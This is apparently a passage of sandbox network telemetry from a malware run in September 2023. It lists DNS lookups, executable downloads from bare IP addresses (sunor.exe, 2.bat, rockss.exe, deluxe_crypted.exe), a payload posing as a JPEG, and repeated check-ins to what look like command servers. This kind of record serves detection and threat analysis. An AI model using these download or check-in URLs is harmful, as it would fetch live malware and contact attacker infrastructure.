User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 18:58:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 14 Sep 2023 17:48:32 GMT
ETag: "67140-6055548cdb22d"
Accept-Ranges: bytes
Content-Length: 422208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.61/fuza/sunor.exe

Remote address:

77.91.68.61:80

Request

GET /fuza/sunor.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.61

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 18:58:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 18 Sep 2023 18:42:14 GMT
ETag: "1f6a95-605a680360d80"
Accept-Ranges: bytes
Content-Length: 2058901
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.61/fuza/2.bat

Remote address:

77.91.68.61:80

Request

GET /fuza/2.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.61

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 18:58:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 16 Sep 2023 19:17:49 GMT
ETag: "4f-6057ec3d4c0b6"
Accept-Ranges: bytes
Content-Length: 79
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

78.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.68.91.77.in-addr.arpa

IN PTR

Response

78.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

61.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

61.68.91.77.in-addr.arpa

IN PTR

Response

61.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://5.42.65.80/rockss.exe

Remote address:

5.42.65.80:80

Request

GET /rockss.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 18 Sep 2023 18:58:33 GMT
Content-Type: application/octet-stream
Content-Length: 4865024
Last-Modified: Sun, 17 Sep 2023 18:20:21 GMT
Connection: keep-alive
ETag: "65074365-4a3c00"
Accept-Ranges: bytes
DNS

91.179.33.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.179.33.162.in-addr.arpa

IN PTR

Response
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

vbc.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31
GET

https://api.ip.sb/ip

5BD7.exe

Remote address:

104.26.12.31:443

Request

GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 18:58:35 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i2JVduTOTQm8pqCXGeTGKjZPriK8mgTc1wv6CeqfiYmcjMS3vXxi6QqlqrbZxd%2F4iGKLAWc1Zlz3Rxep%2FjQbeo8mHHdtFGqwT2gc%2F37SyVBP82jkVOZpcfJNnA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 808bd23c389ab700-AMS
alt-svc: h3=":443"; ma=86400
GET

http://77.91.68.78/lend/1.exe

Remote address:

77.91.68.78:80

Request

GET /lend/1.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 18:58:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 18 Sep 2023 15:48:23 GMT
ETag: "153600-605a4127e153a"
Accept-Ranges: bytes
Content-Length: 1390080
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.78/lend/2.exe

Remote address:

77.91.68.78:80

Request

GET /lend/2.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 18:58:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 18 Sep 2023 15:48:30 GMT
ETag: "153600-605a412eb0732"
Accept-Ranges: bytes
Content-Length: 1390080
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

31.12.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.12.26.104.in-addr.arpa

IN PTR

Response
DNS

25.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

25.113.215.185.in-addr.arpa

IN PTR

Response
DNS

www.facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.247.35
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
GET

https://accounts.google.com/

msedge.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:ovs6nMmH4ex_FbT-xyd0c4-HFUaK1w:VZai4WW1LdhOwj8S
DNS

35.247.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.247.240.157.in-addr.arpa

IN PTR

Response

35.247.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams2facebookcom
DNS

z.nnnaajjjgc.com

ss41.exe

Remote address:

8.8.8.8:53

Request

z.nnnaajjjgc.com

IN A

Response

z.nnnaajjjgc.com

IN A

156.236.72.121
GET

https://z.nnnaajjjgc.com/sts/imagd.jpg

ss41.exe

Remote address:

156.236.72.121:443

Request

GET /sts/imagd.jpg HTTP/1.1
User-Agent: HTTPREAD
Host: z.nnnaajjjgc.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 18 Sep 2023 18:58:43 GMT
Content-Type: image/jpeg
Content-Length: 1507532
Last-Modified: Thu, 07 Sep 2023 13:47:29 GMT
Connection: keep-alive
ETag: "64f9d471-1700cc"
Accept-Ranges: bytes
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

121.72.236.156.in-addr.arpa

Remote address:

8.8.8.8:53

Request

121.72.236.156.in-addr.arpa

IN PTR

Response
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.251.36.14
POST

https://play.google.com/log?format=json&hasfast=true

msedge.exe

Remote address:

142.251.36.14:443

Request

POST /log?format=json&hasfast=true HTTP/2.0
host: play.google.com
content-length: 408
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded;charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://accounts.google.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
POST

https://play.google.com/log?format=json&hasfast=true

msedge.exe

Remote address:

142.251.36.14:443

Request

POST /log?format=json&hasfast=true HTTP/2.0
host: play.google.com
content-length: 447
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded;charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://accounts.google.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

147.174.42.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.174.42.23.in-addr.arpa

IN PTR

Response

147.174.42.23.in-addr.arpa

IN PTR

a23-42-174-147deploystaticakamaitechnologiescom
DNS

19.23.72.62.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.23.72.62.in-addr.arpa

IN PTR

Response
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

Response

196.168.217.172.in-addr.arpa

IN PTR

ams16s32-in-f41e100net
DNS

142.121.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

142.121.18.2.in-addr.arpa

IN PTR

Response

142.121.18.2.in-addr.arpa

IN PTR

a2-18-121-142deploystaticakamaitechnologiescom
DNS

static.xx.fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.196.15
DNS

15.196.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.196.240.157.in-addr.arpa

IN PTR

Response

15.196.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-02-mrs2fbcdnnet
GET

https://api.ip.sb/ip

vbc.exe

Remote address:

104.26.12.31:443

Request

GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 18:58:48 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AbUCWG8TWJ63PXsdePC5dsVt8m4G%2BnjnC404yz8ssGnz0XuLymaeazebaPrBd6V46MAyZbAiJeN3MNvOmFZcYSuQcujPXZk0z2jT6HLFm7YZMH8tN8fFMfCJTw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 808bd28eba42b8ea-AMS
alt-svc: h3=":443"; ma=86400
GET

https://api.ip.sb/ip

vbc.exe

Remote address:

104.26.12.31:443

Request

GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 18:58:49 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YBvNQxom5fDGWTK11N%2B4MzC0NoAzVgAswgackwEfeJMMR1YqCTxs8CSHH0rFB35DOkfFmy05hE6DqK6iTyuThpM%2B%2FF4s8IAtjz6epClSULQk3j%2F5%2FUgF%2BelE2w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 808bd290dac7b897-AMS
alt-svc: h3=":443"; ma=86400
DNS

app.nnnaajjjgc.com

ss41.exe

Remote address:

8.8.8.8:53

Request

app.nnnaajjjgc.com

IN A

Response

app.nnnaajjjgc.com

IN A

154.221.26.108
DNS

app.nnnaajjjgc.com

ss41.exe

Remote address:

8.8.8.8:53

Request

app.nnnaajjjgc.com

IN A

Response

app.nnnaajjjgc.com

IN A

154.221.26.108
GET

http://app.nnnaajjjgc.com/check/safe

ss41.exe

Remote address:

154.221.26.108:80

Request

GET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 18:58:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
POST

http://app.nnnaajjjgc.com/check/?sid=188180&key=11aa112352be7d54edc4d62eba2d3912

ss41.exe

Remote address:

154.221.26.108:80

Request

POST /check/?sid=188180&key=11aa112352be7d54edc4d62eba2d3912 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 160
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 18:58:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
GET

http://app.nnnaajjjgc.com/check/safe

ss41.exe

Remote address:

154.221.26.108:80

Request

GET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 18:58:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
POST

http://app.nnnaajjjgc.com/check/?sid=188198&key=f3aff520e1bb5544ca5b40b0923e8fc3

ss41.exe

Remote address:

154.221.26.108:80

Request

POST /check/?sid=188198&key=f3aff520e1bb5544ca5b40b0923e8fc3 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 160
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 18:58:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
DNS

108.26.221.154.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.26.221.154.in-addr.arpa

IN PTR

Response
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

194.169.175.127
POST

http://host-host-file8.com/

Remote address:

194.169.175.127:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jarvsfsr.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 217
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Mon, 18 Sep 2023 18:59:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
DNS

127.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.175.169.194.in-addr.arpa

IN PTR

Response
DNS

babd89b9-4f30-405b-ad7b-29c3fe622ec4.uuid.pojingchongyuan.net

csrss.exe

Remote address:

8.8.8.8:53

Request

babd89b9-4f30-405b-ad7b-29c3fe622ec4.uuid.pojingchongyuan.net

IN TXT

Response
DNS

server13.pojingchongyuan.net

Remote address:

8.8.8.8:53

Request

server13.pojingchongyuan.net

IN A

Response

server13.pojingchongyuan.net

IN A

185.82.216.50
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.133.233
DNS

stun1.l.google.com

Remote address:

8.8.8.8:53

Request

stun1.l.google.com

IN A

Response

stun1.l.google.com

IN A

142.251.125.127
DNS

acedemon.com

Remote address:

8.8.8.8:53

Request

acedemon.com

IN A

Response

acedemon.com

IN A

172.67.183.152

acedemon.com

IN A

104.21.88.145
DNS

127.125.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.125.251.142.in-addr.arpa

IN PTR

Response

127.125.251.142.in-addr.arpa

IN PTR

nh-in-f1271e100net
DNS

233.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.135.159.162.in-addr.arpa

IN PTR

Response
DNS

50.216.82.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.216.82.185.in-addr.arpa

IN PTR

Response

50.216.82.185.in-addr.arpa

IN PTR

davidcom
DNS

152.183.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

152.183.67.172.in-addr.arpa

IN PTR

Response
DNS

88.16.208.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.16.208.104.in-addr.arpa

IN PTR

Response

77.91.68.29:80

http://77.91.68.29/fks/

http

1.4kB
849 B
9
9

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.124.231:80

260 B
5
77.91.68.29:80

http://77.91.68.29/fks/

http

819 B
508 B
7
6

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.124.231:80

260 B
5
77.91.68.29:80

http://77.91.68.29/fks/

http

9.2kB
8.2kB
44
37

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.68.78:80

http://77.91.68.78/lend/deluxe_crypted.exe

http

35.9kB
795.5kB
568
574

HTTP Request

GET http://77.91.68.78/lend/build.exe

HTTP Response

200

HTTP Request

GET http://77.91.68.78/lend/deluxe_crypted.exe

HTTP Response

200
77.91.68.61:80

http://77.91.68.61/fuza/2.bat

http

85.7kB
2.1MB
1487
1521

HTTP Request

GET http://77.91.68.61/fuza/sunor.exe

HTTP Response

200

HTTP Request

GET http://77.91.68.61/fuza/2.bat

HTTP Response

200
162.33.179.91:80

http

5BD7.exe

930.8kB
13.6kB
683
159
5.42.65.80:80

http://5.42.65.80/rockss.exe

http

87.2kB
5.0MB
1892
3748

HTTP Request

GET http://5.42.65.80/rockss.exe

HTTP Response

200
104.26.12.31:443

https://api.ip.sb/ip

tls, http

5BD7.exe

710 B
3.8kB
8
7

HTTP Request

GET https://api.ip.sb/ip

HTTP Response

200
185.215.113.25:10195

5D5E.exe

551.2kB
14.6kB
427
183
77.91.68.78:80

http://77.91.68.78/lend/2.exe

http

127.6kB
2.9MB
2023
2053

HTTP Request

GET http://77.91.68.78/lend/1.exe

HTTP Response

200

HTTP Request

GET http://77.91.68.78/lend/2.exe

HTTP Response

200
157.240.247.35:443

www.facebook.com

tls

msedge.exe

2.2kB
34.3kB
24
33
142.250.179.141:443

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

tls, http2

msedge.exe

2.3kB
8.7kB
19
21

HTTP Request

GET https://accounts.google.com/

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
156.236.72.121:443

https://z.nnnaajjjgc.com/sts/imagd.jpg

tls, http

ss41.exe

52.3kB
1.6MB
1128
1127

HTTP Request

GET https://z.nnnaajjjgc.com/sts/imagd.jpg

HTTP Response

200
142.251.36.14:443

https://play.google.com/log?format=json&hasfast=true

tls, http2

msedge.exe

3.3kB
10.3kB
22
21

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true
62.72.23.19:80

http

vbc.exe

1.4MB
14.9kB
1035
213
62.72.23.19:80

http

vbc.exe

1.4MB
16.2kB
1044
243
157.240.196.15:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.196.15:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.196.15:443

static.xx.fbcdn.net

tls

msedge.exe

4.0kB
29.5kB
47
49
104.26.12.31:443

https://api.ip.sb/ip

tls, http

vbc.exe

710 B
3.8kB
8
7

HTTP Request

GET https://api.ip.sb/ip

HTTP Response

200
104.26.12.31:443

https://api.ip.sb/ip

tls, http

vbc.exe

710 B
3.8kB
8
7

HTTP Request

GET https://api.ip.sb/ip

HTTP Response

200
154.221.26.108:80

http://app.nnnaajjjgc.com/check/?sid=188198&key=f3aff520e1bb5544ca5b40b0923e8fc3

http

ss41.exe

2.1kB
1.7kB
16
13

HTTP Request

GET http://app.nnnaajjjgc.com/check/safe

HTTP Response

200

HTTP Request

POST http://app.nnnaajjjgc.com/check/?sid=188180&key=11aa112352be7d54edc4d62eba2d3912

HTTP Response

200

HTTP Request

GET http://app.nnnaajjjgc.com/check/safe

HTTP Response

200

HTTP Request

POST http://app.nnnaajjjgc.com/check/?sid=188198&key=f3aff520e1bb5544ca5b40b0923e8fc3

HTTP Response

200
194.169.175.127:80

http://host-host-file8.com/

http

759 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
185.82.216.50:443

server13.pojingchongyuan.net

tls

1.8kB
7.3kB
13
15
162.159.135.233:443

cdn.discordapp.com

tls

1.0kB
4.6kB
10
11
172.67.183.152:443

acedemon.com

tls

1.1kB
8.3kB
12
14

8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

17.160.190.20.in-addr.arpa
8.8.8.8:53

240.81.21.72.in-addr.arpa

dns

71 B
142 B
1
1

DNS Request

240.81.21.72.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

54.120.234.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

54.120.234.20.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53

254.111.26.67.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

254.111.26.67.in-addr.arpa
8.8.8.8:53

78.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

78.68.91.77.in-addr.arpa
8.8.8.8:53

61.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

61.68.91.77.in-addr.arpa
8.8.8.8:53

91.179.33.162.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

91.179.33.162.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

vbc.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.12.31

172.67.75.172

104.26.13.31
8.8.8.8:53

31.12.26.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

31.12.26.104.in-addr.arpa
8.8.8.8:53

25.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

25.113.215.185.in-addr.arpa
8.8.8.8:53

www.facebook.com

dns

msedge.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.247.35
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
8.8.8.8:53

35.247.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.247.240.157.in-addr.arpa
142.250.179.141:443

accounts.google.com

https

msedge.exe

8.3kB
127.1kB
72
121
8.8.8.8:53

z.nnnaajjjgc.com

dns

ss41.exe

62 B
78 B
1
1

DNS Request

z.nnnaajjjgc.com

DNS Response

156.236.72.121
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
